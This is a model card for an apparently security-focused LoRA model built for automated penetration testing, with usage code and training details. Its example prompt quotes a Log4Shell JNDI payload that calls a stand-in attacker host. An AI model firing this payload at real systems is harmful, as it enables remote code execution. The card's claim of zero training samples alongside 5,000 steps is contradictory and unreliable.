vext-pentest-7b

A security-specialized language model by VEXT Labs Inc for autonomous penetration testing and vulnerability assessment.

Built as a LoRA adapter on Qwen/Qwen2.5-7B-Instruct, fine-tuned on real-world security testing data including tool output interpretation, attack planning, vulnerability classification, and remediation guidance.

What This Model Does

vext-pentest-7b is trained to:

• Interpret security tool output — Parse and reason about results from nuclei, dalfox, sqlmap, gobuster, naabu, and 20+ other security tools
• Plan attack strategies — Given a target scope and reconnaissance data, decide which tools to run and in what order
• Classify vulnerabilities — Distinguish true positives from false positives with high accuracy
• Generate remediation advice — Provide actionable fix recommendations for discovered vulnerabilities

Usage

With vLLM (Recommended for Production)

# Start vLLM with LoRA support
python -m vllm.entrypoints.openai.api_server \
    --model Qwen/Qwen2.5-7B-Instruct \
    --enable-lora \
    --lora-modules vext-pentest-7b=/path/to/adapter \
    --max-lora-rank 32

With PEFT + Transformers

from peft import PeftModel
from transformers import AutoModelForCausalLM, AutoTokenizer

base = AutoModelForCausalLM.from_pretrained("Qwen/Qwen2.5-7B-Instruct", torch_dtype="auto", device_map="auto")
model = PeftModel.from_pretrained(base, "VextLabs/vext-pentest-7b")
tokenizer = AutoTokenizer.from_pretrained("VextLabs/vext-pentest-7b")

messages = [
    {"role": "system", "content": "You are a security testing agent. Analyze the following tool output and identify vulnerabilities."},
    {"role": "user", "content": "Nuclei scan results:\n[critical] CVE-2021-44228 Log4Shell detected at /api/login\nPOC: ${jndi:ldap://attacker.com/a}"}
]

text = tokenizer.apply_chat_template(messages, tokenize=False, add_generation_prompt=True)
inputs = tokenizer(text, return_tensors="pt").to(model.device)
output = model.generate(**inputs, max_new_tokens=512)
print(tokenizer.decode(output[0], skip_special_tokens=True))

Training Details

Parameter	Value
Base model	Qwen/Qwen2.5-7B-Instruct
Method	LoRA (Low-Rank Adaptation)
Rank	32
Alpha	64
Target modules	k_proj, v_proj, q_proj, down_proj, o_proj, gate_proj, up_proj
Training steps	5,000
Training samples	0
Final loss	0.5114268112182617
Precision	bfloat16

Training Data

Fine-tuned on proprietary security testing data generated by the VEXT platform, including:

• Tool execution traces (input parameters, raw output, parsed results)
• Attack planning decisions (which tool to use, why, expected outcomes)
• Vulnerability validation (true positive vs false positive classification)
• Multi-step attack chains (reconnaissance → enumeration → exploitation)

Data was collected from authorized testing against intentionally vulnerable applications (OWASP Juice Shop, DVWA, bWAPP, WebGoat, and others) and authorized bug bounty targets.

Responsible Use

This model is intended for authorized security testing only. It should be used:

• Within the scope of authorized penetration testing engagements
• Against applications you own or have explicit permission to test
• In CTF (Capture the Flag) competitions and security training environments
• For defensive security research and vulnerability assessment

Do not use this model for unauthorized access to computer systems.

About VEXT Labs Inc

VEXT Labs is building autonomous security testing agents that combine LLM reasoning with real security tools. Our agents run full penetration tests — from reconnaissance to exploitation to reporting — with human-level decision making.

Learn more at tryvext.com

License

Apache 2.0